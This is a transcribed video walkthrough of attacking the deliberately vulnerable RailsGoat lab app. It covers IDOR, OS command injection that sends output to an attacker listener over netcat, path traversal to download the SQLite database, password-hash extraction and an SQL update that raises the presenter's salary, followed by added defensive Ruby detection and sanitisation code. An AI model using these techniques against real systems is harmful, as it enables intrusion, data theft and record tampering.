How hackers hack any website in minutes!


Introduction

Today I'll be teaching you how you can be as good-looking as Mr Hackerloi. I'm just kidding. I'll be teaching you how to be a hacker instead, which is much easier. Now, before we get started, kids, remember: hacking is illegal. If you get caught hacking, there's really nothing much I can do to help you. The police will come knocking on your door and get you arrested, and the next thing you know, you can never see Mr Hackerloi again.

So here's a list of things we'll be doing.

First of all, you'll be entering the website URL, and in this case it could be, say, loiliangyang.com as your target. Well, I mean, we're not here for online shopping, you know. Next, you begin targeting the server using an operating system like Kali Linux, which is loaded with all these different hacking tools and scripts that we can use against the site. In this case we'll be looking for potential vulnerabilities on the site. Those could be, for example, SQL injection, or operating system command injection in different features of the site, and the craziest thing is that we can even change information that is displayed on the site. The reason we can do that is that behind every website there is a gigantic database of information that could contain usernames, passwords and salary information. That's very juicy, and it's a lot of data that we can target.

Now, before we get started, kids: this is going to be a pretty long tutorial and you need at least 15 cups. Remember, kids, with great power comes great responsibility, and what you need to do right now is turn on notifications so that you don't get hacked.

Right in front of us we're in Kali Linux. This is going to be your best friend. Of course, your best friend forever, your BFF, is Hackerloi, and the next best friend is Kali Linux. I open up a browser, in this case Firefox, and target the site by entering its URL. In my case I enter the IP address of the target server followed by /railsgoat, so this is the website we will be targeting. In other cases you could be going to, say, loiliangyang.com as the targeted site, but if you really target loiliangyang.com, I assure you I will find out your IP address. I will find out everything about your location, your name, your password. Oh, don't worry, I'm just helping you find out your password.

Right in front of us is the login page. We can log in to the site or register, and while trying to figure out the application structure we have to really understand how data flows from the browser all the way to the back-end system. I have already created an account, so I log in as hackerloi@hackerloi.com, enter the password and click Login. Boom, done. We are now logged in, and this looks like a human resources (HR) system: we have the 401K, the available PTO, sick days taken, income and so on. On the left side are the different pages of the site that we can target. The very first thing you need to do as a professional hacker is to go over each of these pages so that you understand the application structure inside out: how the pages work and what the URLs are.

Here we have something pretty interesting already. In the URL we have users, then a number, and then another page called benefit forms. This reveals a lot, because if I were to create another user, the seven would become another digit. The other thing we're looking for is on the page itself: we have health insurance as well as dental insurance, and the ability to upload a file. If we click on health insurance or dental insurance, we get a PDF document. Again we look at the URL: we have download?name= followed by a .pdf file name, and type=File. Pretty interesting, so this is a possible entry point or injection point for us. Likewise for dental: a .pdf name and type=File, so again this is another possible entry point. The reason I say this could be a potential entry point is this: if I were to change the name into ../../../, would I be able to reach another file of interest just by pointing it at a completely separate file name or path?

Maybe you're thinking: Mr Hackerloi, why aren't you doing a brute-force attack against the login page? A website typically has a login page, and what hackers do is target the login page using all sorts of email addresses that they have already mined or harvested, together with combinations of commonly used passwords like 12345678 or password, injecting them directly into the login fields. The downside is that this is easily detected and prevented at the application or at the firewall level. What we need to do, then, is be more creative in our attack approach.

What we'll be doing now is go to the top right corner and set up our interceptor. In this case we'll be using Burp Suite as our interceptor, to look at all the different requests that are going to be sent to the application server, so click on that. Next comes the super cool stuff that you want to learn, which is to look like a hacker: open up a terminal and enter burpsuite followed by &. Now we're opening up our interceptor. Here we have Burp Suite Community Edition; click Start Burp, then go to the Proxy tab and ensure Intercept is on.

Once we have that, I click Upload File and then Add File. In this case I upload a normal file, so I select a .txt file, click Start Upload, and we're intercepting. Back in Burp Suite Community Edition, the first request is a live reload, so drop that one, and right here we have POST /railsgoat/upload. Right-click on it and send it to Repeater. The reason I send it to Repeater is that I want to understand what is part of the HTTP request that is going to be sent to the application server.

Here we can see the following. We have POST, which is the HTTP method, so we are uploading or posting things to the target URL, which is /railsgoat/upload. We have the User-Agent information from the browser, Accept, Accept-Language, and Content-Type, which in this case is multipart form data. We have the Origin, Referer and Cookie information, including the railsgoat session, which is what the site uses as your session identity, your session value, as part of the cookie. As I scroll down further we have Upgrade-Insecure-Requests: 1. We have a Content-Disposition part with the name utf8 and a tick, possibly to indicate that it is a legitimate request. There are more Content-Disposition parts: an authenticity token, which is interesting because it could be data they use later on, and a false value under benefits backup. That's interesting too. Then we have the file as well as the file information right at the bottom; this is the Hackerloi salary .doc file, which was part of another tutorial that we did earlier.

To speed up your learning as you run all these different checks and scans looking for vulnerable openings: the whole idea behind ethical hacking, or hacking as a whole, is to find entry points and injection points. Whether it is SQL injection or operating system command injection, the goal is to find a part of the site that is vulnerable. So what happens if I change this false to true? The field is benefits backup, so is it trying to copy an uploaded file into a backup directory? Could that be the case? We don't know, because this is black-box testing: we have no idea about the application structure and we need to figure that out first. If I change it to true and click Send, you can see on the right that we are being redirected back to /railsgoat/users/7/benefit_forms, which is to be expected. If I change it back to the default value of false and click Send, it's the same thing; not much change is seen. So there could be some kind of instructions run either by the application itself or at the operating system level. Those are things that could be running as part of this application, and we want to exploit that.

Moving on, we can also click on other pages. We have 401K info, and once again you can see in the URL /railsgoat/users/7/retirement, then PTO, work info and so on. Possibly one of them has a vulnerability, meaning that if we change this value we may see something else. For example, I change it to six and hit Enter, and boom, we see someone else's data. I enter five and we see Ken Johnson's data. So some parts of the site are vulnerable and other parts are not, and these are all things you can try to see whether you are getting a vulnerable entry point to go after.

We also have messages on the left. When you click on Messages you're able to send a message to the different users within the application, so these messages are stored in the back-end database system. Typically, if you are able to send messages, you may be thinking about a cross-site scripting attack: this is a point where you can inject your own script along with the message, and when the user opens the message it possibly redirects them to hackerloi.com.

Finally, in the top right corner you can click on Account Settings, where you're able to update your personal information too. Likewise, I turn on FoxyProxy, enter the first name Hackerloi, fill in the password and password confirmation fields and click Submit. In Burp Suite, on the Proxy tab, I drop the live reload again, and in this case we have POST /users/7.json, and at the bottom you see the user, the password confirmation and all these different details. If I send this to Repeater, on the second Repeater tab you can see the information that is sent along to the back-end system. Behind every application server there is a database, and we also want to figure out what kind of database they are using: is it Microsoft SQL Server, MySQL, PostgreSQL, SQLite? These are all possible databases that we are targeting as part of launching the hack.
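What the reads of other users' /users/<id>/ pages and the ../ probing of the download name parameter described above look like from the defender's side, as an added detection example that is not part of the original tutorial or of the application. The log format, the sample lines and the file name health_insurance.pdf are constructed for illustration.

```ruby
require "uri"

# Constructed sample log (not from the page). Assumed format:
# "<id of the logged-in user> <method> <request target>"
SAMPLE_LOG = <<~LOG
  7 GET /railsgoat/users/7/retirement
  7 GET /railsgoat/users/6/retirement
  7 GET /railsgoat/users/5/retirement
  7 GET /railsgoat/download?name=health_insurance.pdf&type=File
  7 GET /railsgoat/download?name=..%2F..%2F..%2Fdb%2Fdevelopment.sqlite3&type=File
  3 GET /railsgoat/users/3/work_info
LOG

Finding = Struct.new(:user_id, :kind, :detail)

# Decode percent-encoding a bounded number of times so that double-encoded
# separators ("%252F") are seen the way a lenient back end might see them.
def fully_decode(value, rounds = 3)
  rounds.times do
    decoded = URI.decode_www_form_component(value)
    return decoded if decoded == value
    value = decoded
  end
  value
rescue ArgumentError
  value # malformed escape: keep the last form that decoded cleanly
end

# True when a requested name is absolute or contains a ".." path segment.
def traversal?(name)
  decoded = fully_decode(name).tr("\\", "/")
  decoded.start_with?("/") || decoded.split("/").include?("..")
end

# Split a raw query string into a hash without decoding the values.
def query_params(query)
  query.to_s.split("&").to_h do |pair|
    key, val = pair.split("=", 2)
    [key.to_s, val.to_s]
  end
end

# Flag requests for another user's /users/<id> pages and traversal attempts
# in the download endpoint's name parameter.
def scan(log_text)
  log_text.each_line.with_object([]) do |line, findings|
    user_id, _method, target = line.split(" ", 3)
    next if target.nil? || target.strip.empty?
    path, query = target.strip.split("?", 2)
    owner = path[%r{/users/(\d+)(?:[/.]|\z)}, 1]
    if owner && owner != user_id
      findings << Finding.new(user_id, :cross_user_access, path)
    end
    name = query_params(query)["name"] if path.end_with?("/download")
    if name && traversal?(name)
      findings << Finding.new(user_id, :path_traversal, fully_decode(name))
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG).each { |f| puts "user #{f.user_id}: #{f.kind} #{f.detail}" }
end
```

Detection only narrows the window; the underlying fix for the cross-user reads is a server-side check that the id in the URL belongs to the logged-in user.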

Now, as far as testing goes, we really want to understand what the potential entry points or injection points are. Suppose that as part of testing you have run several checks against all these different parameters and input fields, and you have uncovered that the file name is susceptible to operating system command injection. In that case, what we can do under the file name is test it out. In this situation I can say ls, and then have a connection over to the hacker's machine, in this case 192.168.0.118 on port 4444. What this does is stream the output of ls, which is the listing of the files and directories within the current working directory, over to our hacker's machine.

So I set up netcat. I enter ip addr, and this shows the hacker's IP address of 192.168.0.118, and then I enter nc to set up our listener. With the listener set up, I go back to Burp Suite, where we have ls followed by netcat to 192.168.0.118 on port 4444. If I click Send and go back to the netcat listener, we can see the output right here, and there you go: you have hacked into the machine. This is the current working directory of the application server, and we have several interesting directories, such as possibly db and config. These are all targets that we're going after, because we want to find out whether they're storing the usernames or the passwords somewhere. Operating system command injection has allowed us to map out the application structure very cleanly.

Now I change this up a little bit. I want to know what the current working directory is, so I'll be using pwd, which prints the working directory, again sending the information over to the hacker's machine. I set up a listener, go back to Burp Suite and click Send, and we get owaspbwa/railsgoat-git. I've copied the results from the operating system command injection over here, so we understand that the application is running from owaspbwa/railsgoat-git, and we are targeting the directory db, which likely stands for database. We are very interested in it because it could show us information like usernames and passwords that would allow us to do other things.

Back in Burp Suite, we want to see what is inside the db directory. We've changed the operating system command a little more: we do a cd into the db directory and then an ls, so we go into the database directory and then list it. Set up your listener, go back to Burp Suite, click Send, and you can see the following: development.sqlite3, schema.rb, seeds.rb and test.sqlite3.

What we want to do now is figure out a way to download that file. If I go back to the railsgoat download URL with name=, I can try to see whether we're able to target the directory holding the development.sqlite3 file. I enter ../ repeatedly. The reality is that we don't know what the current working directory of the download is, but five of these allow us to move back to the root directory, and from there we can target the file. From the earlier result we have owaspbwa/railsgoat-git, so I go back to the URL, paste that in, remove the original file name and add /db/development.sqlite3, which is the file we are targeting. I go back to the browser, hit Enter, and now we can save the file. I've already done this setup and testing for you, so I replace the existing file. Done: we managed to download the file because of a vulnerability, another entry point for us to download information from within the operating system.

At this point I hit Enter on that, and now we can query the database. You can enter .tables and see all the different tables within the application: benefits, paid time offs, retirements, users (users is pretty interesting), messages, pay schedules and work infos. These are all tables that we are targeting. To interact with them I enter SELECT * FROM users and hit Enter, and boom, this is super cool: we have admin@metacorp.com, we have Jack, Jim, Mike and Ken, a Loi Liang Yang Gmail address, and Hackerloi as well. These are all the different users, and the second column seems to be some kind of hashed password. We could go to rainbow tables, where lists of commonly used passwords have been run through the same hashing algorithm, do a reverse lookup and see what we get.

Additionally, you can also ask for the table info, in this case for users, and see the columns. We have the first column as id, the second as email, the third as password, and then admin. That's interesting: whether the user is an admin or not, true or false, pretty straightforward. Then we have a user ID, which is assigned incrementally: one, two, three, four, five, six and seven. And finally we have another interesting piece of information that we could possibly use for, say, trying to hijack another user's session.

Before I go any further, you may be thinking: why don't I go straight for a reverse shell, especially now that I have the ability to run operating system commands? So what exactly are reverse shells? On the left you have the target server, and on the right you have Mr Hackerloi. With operating system command injection you can make the server run a command that connects over to Mr Hackerloi's machine, and then we can remotely control the entire computer. However, the reason we cannot do that in this tutorial is that there is some kind of input sanitization in the application, or possibly a firewall protecting the application. What's happening is that in the middle there seems to be a firewall, or sometimes the filter is embedded within the application layer, and it is filtering some common special characters such as slashes, single quotes, double quotes and possibly semicolons too. These special characters may be completely removed as part of protecting the application against all these different types of attacks.

Now, going back to Kali Linux: is there a way for us to update our salary information? That's pretty interesting. I enter SELECT * FROM work_infos and hit Enter, and we can see that the user with ID seven is currently on sixty thousand dollars. Is there a way for us to change this to, say, a million? The answer is yes, and we need a combination of several things for this hack to work. The first thing we need to do is upload a file containing some instructions, and the second is to execute that file.

So I enter the following. We have cd to db, and remember that the application is escaping the single quote, the forward slashes and the backslashes, so we're very limited in what we can do. What we have here is the final payload: we change directory to the database directory and we do an echo, and in this case we're echoing an update of work_infos that sets income to 100,000 where the user ID is equal to seven.

conclusion

Now we put a semicolon to end the sqlite command, which in this case is a structured query language command. Then we have the single quote, which allows us to end whatever we want to echo and save it to a file within the db directory, and then we put a hash, which comments out the rest of the operating system command. Super clean, super neat, super smart. Once you're ready, click Send, and boom, done: the file is now created on the back end.

You can easily check on that. Again do cd db and ls -l, followed by netcat to 192.168.0.118 on port 4444. This again lets us send that information out because of the operating system command injection that we discovered as an entry point. I enter nc -nlvp 4444, hit Enter, go back to Burp Suite, click Send and see what we get. Back in the listener, I can see the file, and it has been updated based on the most current time. Of course, you can do a cat on the file as well to get its contents out.

What we want to do now is go back to Burp Suite and execute the update. This is the final payload: we change directory to the database directory again, we have sqlite3 with development.sqlite3, and then we run the instructions in the file, which update work_infos so that Hackerloi gets a better salary, and we have the hash at the end commenting out the rest of the operating system command. Once you're ready, click Send. Boom. I go back to the browser, click on Work Info, and right here we have the income of a hundred thousand dollars. So thank you for giving me a better salary.
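The server-side fix for the two entry points this walkthrough relies on (a client-chosen download path and an upload file name that reaches an operating system command), as an added example that is not the application's own code. The function names, the bak_ prefix and the directory layout are assumptions made for illustration.

```ruby
require "fileutils"
require "tmpdir"

class UnsafeName < StandardError; end

# Risky patterns this replaces (assumed shape, not the application's source):
#   system("cp #{tmp_path} #{backup_dir}/bak_#{original_filename}")  # a shell parses the name
#   send_file(params[:name])                                         # the client picks the path

# Reduce a client-supplied upload name to a harmless base name.
def safe_basename(client_name)
  base = client_name.to_s.tr("\\", "/").split("/").last.to_s
  cleaned = base.gsub(/[^A-Za-z0-9._-]/, "_")
  raise UnsafeName, "empty or dot-only name" if cleaned.empty? || cleaned.match?(/\A\.+\z/)
  cleaned
end

# Resolve a requested download strictly inside base_dir, or raise.
def resolve_download(base_dir, requested)
  base = File.realpath(base_dir)
  raise UnsafeName, "null byte in name" if requested.to_s.include?("\0")
  candidate = File.expand_path(File.join(base, requested.to_s))
  inside = ->(path) { path.start_with?(base + File::SEPARATOR) }
  raise UnsafeName, "outside download directory" unless inside.call(candidate)
  raise UnsafeName, "not a regular file" unless File.file?(candidate)
  real = File.realpath(candidate) # follows symlinks before the final check
  raise UnsafeName, "symlink leaves download directory" unless inside.call(real)
  real
end

# Copy an upload into backup_dir without involving a shell, so characters
# such as ; | # ' in the name are never interpreted as commands.
def backup_upload(tmp_path, backup_dir, original_filename)
  dest = File.join(backup_dir, "bak_#{safe_basename(original_filename)}")
  FileUtils.cp(tmp_path, dest)
  dest
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |root|
    docs = File.join(root, "docs")
    FileUtils.mkdir_p(docs)
    File.write(File.join(docs, "health.pdf"), "pdf")
    puts resolve_download(docs, "health.pdf")
    begin
      resolve_download(docs, "../db/development.sqlite3")
    rescue UnsafeName => e
      puts "blocked: #{e.message}"
    end
  end
end
```

Keeping the SQLite files outside any directory the web process can serve, and storing passwords with a salted, slow hash, limits what a traversal bug can expose if one is missed.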
